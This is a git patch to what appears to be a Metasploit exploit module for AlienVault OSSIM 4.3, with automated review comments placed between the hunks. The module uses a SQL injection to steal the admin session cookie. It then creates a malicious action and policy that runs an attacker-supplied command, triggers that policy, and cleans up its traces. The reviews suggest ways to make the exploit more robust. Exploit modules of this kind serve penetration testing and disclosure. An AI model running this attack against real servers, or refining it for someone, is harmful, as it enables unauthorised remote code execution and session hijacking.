From 245b59124727210386920bc3fecc40367e8db8d2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 28 Apr 2014 11:45:40 -0500 Subject: [PATCH] Do module clean up --- .../unix/webapp/alienvault_sqli_exec.rb | 182 +++++++++--------- 1 file changed, 92 insertions(+), 90 deletions(-) diff --git a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb index 8c7653c8a5..f3bfa8a513 100644 --- a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb +++ b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb @@ -27,12 +27,14 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ + ['OSVDB', '106252'], + ['EDB', '33006'] ], 'DefaultOptions' => { 'SSL' => true }, - 'Platform' => ['unix'], + 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { @@ -43,10 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - ['Alienvault OSSIM', {}] + ['Alienvault OSSIM 4.3', {}] ], 'Privileged' => true, - 'DisclosureDate' => "Apr 28 2014", + 'DisclosureDate' => "Apr 24 2014", 'DefaultTarget' => 0)) register_options( 
@@ -58,22 +60,20 @@ class Metasploit3 < Msf::Exploit::Remote def check - # Check version - vprint_status("#{peer} - Trying to detect vulnerable OSSIM") - marker = rand_text_alpha(6) - sqlirand = rand_text_numeric(4+rand(4)) + sqli_rand = rand_text_numeric(4+rand(4)) sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) " - sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1" + sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), 'vars_get' => { 'date_from' => sqli } }) - if res and res.code == 200 and res.body =~ /#{marker}726F6F74403132372E302E302E31#{marker}/ # 726F6F74403132372E302E302E31 = root@127.0.0.1 + if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root return Exploit::CheckCode::Vulnerable else + print_status("#{res.body}") return Exploit::CheckCode::Safe end @@ -82,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote def exploit marker = rand_text_alpha(6) - sqlirand = rand_text_numeric(4+rand(4)) + sqli_rand = rand_text_numeric(4+rand(4)) sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) " - sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqlirand}'='#{sqlirand}" + sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}" print_status("#{peer} - Trying to grab admin session through SQLi") 
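Review bot: The `print_status("#{res.body}")` added on the Safe branch of `check` can raise NoMethodError: the `if` condition short-circuits on `res &&`, so the else branch is also reached when `send_request_cgi` returned nil (no response at all), and `nil.body` then aborts the check instead of returning `Exploit::CheckCode::Safe`. Guard it and keep the dump at verbose level, since it prints an entire response body at normal status level: `vprint_status(res.body) if res`. The string interpolation is also redundant because `res.body` is already a String. The closing `end` of `check` lies outside the hunk.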
@@ -93,9 +93,9 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_get' => { 'date_from' => sqli } }) - if res and res.code == 200 and res.body =~ /#{marker}(.*)#{marker}/ - adminsession = $1 - @cookie = "PHPSESSID=" + ["#{adminsession}"].pack("H*") + if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/ + admin_session = $1 + @cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*") print_status("#{peer} - Admin session cookie is [ #{@cookie} ]") else fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session") @@ -118,24 +118,26 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 + if res && res.code == 200 print_status("#{peer} - Created Action [ #{action} ]") else fail_with(Failure::Unknown, "#{peer} - Action creation failed!") end - # Retrieving the Action ID, used to clean up the action after succesful exploitation - post_vars = "page=1&rp=2000" + # Retrieving the Action ID, used to clean up the action after successful exploitation res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"), 'cookie' => @cookie, - 'data' => post_vars + 'vars_post' => { + 'page' => '1', + 'rp' => '2000' + } }) - if res and res.code == 200 and res.body =~ /actionform.php\?id=(.*)'>#{action}/ - @actionid = $1 - print_status("#{peer} - Action ID is [ #{@actionid} ]") + if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/ + @action_id = $1 + print_status("#{peer} - Action ID is [ #{@action_id} ]") else fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!") end 
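Review bot: `["#{admin_session}"].pack("H*")` in the -93 hunk wraps a value that is already a String (`$1`) in interpolation; `[admin_session].pack('H*')` says the same thing without the extra allocation. Since the commit is already renaming locals for readability, the `$1`/`$2` captures here and in the -118, -152, -223 and -277 hunks would read better as `Regexp.last_match(1)` / `Regexp.last_match(2)`, which makes the dependency on the preceding `=~` explicit. The regexes interpolate `marker` and `action` unescaped, which is only fine because both come from `rand_text_alpha`; a one-line comment such as `# marker/action are alphabetic (rand_text_alpha), safe to interpolate into the regex unescaped` would record that assumption. The enclosing `exploit` method begins in the previous hunk and continues past this one.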
@@ -143,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retrieving the policy data, necessary for proper cleanup after succesful exploitation res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "policy.php"), + 'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"), 'cookie' => @cookie, 'vars_get' => { 'm_opt' => 'configuration', @@ -152,10 +154,10 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 and res.body =~ /getpolicy.php\?ctx=(.*)\&group=(.*)',/ - policyctx = $1 - policygroup = $2 - print_status("#{peer} - Policy data [ ctx=#{policyctx} ] and [ group=#{policygroup} ] retrieved!") + if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/ + policy_ctx = $1 + policy_group = $2 + print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!") end @@ -169,8 +171,8 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => { 'descr' => policy, 'active' => '1', - 'group' => policygroup, - 'ctx' => policyctx, + 'group' => policy_group, + 'ctx' => policy_ctx, 'order' => '1', # Makes this the first policy, overruling all the other policies 'action' => 'new', 'sources[]' => '00000000000000000000000000000000', # Source is ANY @@ -201,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote 'end_day_week' => '7', 'end_day_month' => '31', 'end_month' => '12', - 'actions[]' => @actionid, + 'actions[]' => @action_id, 'sim' => '1', 'priority' => '1', 'qualify' => '1', @@ -211,7 +213,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 + if res && res.code == 200 print_status("#{peer} - Created Policy [ #{policy} ]") else fail_with(Failure::Unknown, "#{peer} - Policy creation failed!") 
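Review bot: The -143 hunk changes a single `normalize_uri` call to `target_uri.path.to_s`, while the calls for getaction.php, getpolicy.php, deletepolicy.php and deleteaction.php in the neighbouring hunks keep passing `target_uri.path`. If `.to_s` is there because `path` can be nil (I cannot confirm that from the diff), every call is equally exposed and should be changed the same way; if it is not needed, this one-off is just noise — either way the module should be consistent. Separately, `\&` in the -152 regex `/getpolicy\.php\?ctx=(.*)\&group=(.*)',/` is an unnecessary escape, since `&` is not a metacharacter outside a character class; `&group=` is enough. The `exploit` method extends outside these hunks.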
@@ -223,23 +225,22 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"), 'cookie' => @cookie, 'vars_get' => { - 'ctx' => policyctx, - 'group' => policygroup + 'ctx' => policy_ctx, + 'group' => policy_group }, 'vars_post' => { 'page' => '1', 'rp' => '2000' } }) - if res and res.code == 200 and res.body =~ /row id='(.*)' col_order='1'/ - @policyid = $1 - print_status("#{peer} - Policy ID [ #{@policyid} ] retrieved!") + if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/ + @policy_id = $1 + print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!") end # Reload the policies to make our new policy active - policy = rand_text_alpha(8) print_status("#{peer} - Reloading Policies") res = send_request_cgi({ 'method' => 'GET', @@ -251,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 + if res && res.code == 200 print_status("#{peer} - Policies reloaded!") else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") @@ -259,15 +260,15 @@ class Metasploit3 < Msf::Exploit::Remote # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. - dontexist = rand_text_alpha(8+rand(4)) + dont_exist = rand_text_alpha(8+rand(4)) print_status("#{peer} - Triggering policy and action by requesting a non existing url") res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, dontexist), + 'uri' => normalize_uri(target_uri.path, dont_exist), 'cookie' => @cookie }) - if res and res.code == 404 + if res && res.code == 404 print_status("#{peer} - Payload delivered") else fail_with(Failure::Unknown, "#{peer} - Payload failed!") 
@@ -277,58 +278,59 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup - # Clean up, retrieve token so that the policy can be removed - print_status("#{peer} - Cleaning up") - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), - 'cookie' => @cookie, - 'vars_post' => { 'f_name' => 'delete_policy' } - }) + begin + # Clean up, retrieve token so that the policy can be removed + print_status("#{peer} - Cleaning up") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), + 'cookie' => @cookie, + 'vars_post' => { 'f_name' => 'delete_policy' } + }) - if res and res.code == 200 and res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ - token = $1 - print_status("#{peer} - Token [ #{token} ] retrieved") - else - print_warning("#{peer} - Unable to retrieve token") + if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ + token = $1 + print_status("#{peer} - Token [ #{token} ] retrieved") + else + print_warning("#{peer} - Unable to retrieve token") + end + + # Remove our policy + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'confirm' => 'yes', + 'id' => @policy_id, + 'token' => token + } + }) + + if res && res.code == 200 + print_status("#{peer} - Policy ID [ #{@policy_id} ] removed") + else + print_warning("#{peer} - Unable to remove Policy ID") + end + + # Remove our action + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'id' => @action_id, + } + }) + + if res && res.code == 200 + print_status("#{peer} - Action ID [ #{@action_id} ] removed") + else + print_warning("#{peer} - Unable to remove Action ID") + end + ensure + super # mixins should be able to 
cleanup even in case of Exception end - - # Remove our policy - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"), - 'cookie' => @cookie, - 'vars_get' => { - 'confirm' => 'yes', - 'id' => @policyid, - 'token' => token - } - }) - - if res and res.code == 200 - token = $1 - print_status("#{peer} - Policy ID [ #{@policyid} ] removed") - else - print_warning("#{peer} - Unable to remove Policy ID") - end - - # Remove our action - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"), - 'cookie' => @cookie, - 'vars_get' => { - 'id' => @actionid, - } - }) - - if res and res.code == 200 - token = $1 - print_status("#{peer} - Action ID [ #{@actionid} ] removed") - else - print_warning("#{peer} - Unable to remove Action ID") - end - end end
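Review bot: In the rewritten `cleanup`, when the token request fails the code only prints a warning and then still sends deletepolicy.php with `'token' => token`, where `token` is nil (the local exists but was never assigned), so a request that is already known to be rejected is issued anyway; wrapping the policy removal in `if token` (or a `return` after the warning, which still runs the `ensure`) makes the warning the end of that path. The same applies to `@policy_id` and `@action_id`: if, as I believe, the framework invokes `cleanup` even when `exploit` bailed out early via `fail_with`, both are nil and the two delete requests go out with an empty `id`, so each should be guarded with `if @policy_id` / `if @action_id`. Stylistically, Ruby accepts an `ensure` clause directly on the method body, so the `begin`/`end` wrapper and one level of indentation can be dropped: `def cleanup`, body, `ensure`, `super`, `end`. Dropping the stray `token = $1` assignments after the delete requests was a good catch.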